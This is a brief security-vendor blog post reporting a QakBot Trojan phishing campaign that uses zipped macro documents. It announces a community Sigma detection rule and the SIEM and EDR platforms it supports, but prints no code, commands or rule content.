The QBot banking Trojan that is also known as Qakbot or Pinkslipbot has been known to cybersecurity researchers since 2008, and it keeps tricking the business with emerging campaigns demonstrating its elaborated stealth capabilities.
Another phishing campaign delivering the malicious document has attracted the researchers’ attention. The latest QakBot attack is notable for delivering a ZIP file with a document, not a Microsoft Word document attachment. The zipped document includes a macro executing a PowerShell script that on its turn downloads the QakBot payload from the predefined URL.
We already warned our readers about the cunning QakBot Trojan in the Rule of the Week post. https://socprime.com/blog/rule-of-the-week-qbot-trojan-detection/
Today, we want to inform you that the attackers have added two techniques to their arsenal – CDR (content disarm and reconstruction) technology bypass, as well as child-parent pattern detection bypass.
Osman Demir, active participant of Threat Bounty Developer Program published a Sigma rule to detect the modernized QakBot Trojan:
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Carbon Black, Elastic Endpoint
Techniques: Command-Line Interface (T1059), PowerShell (T1059), User Execution (T1204)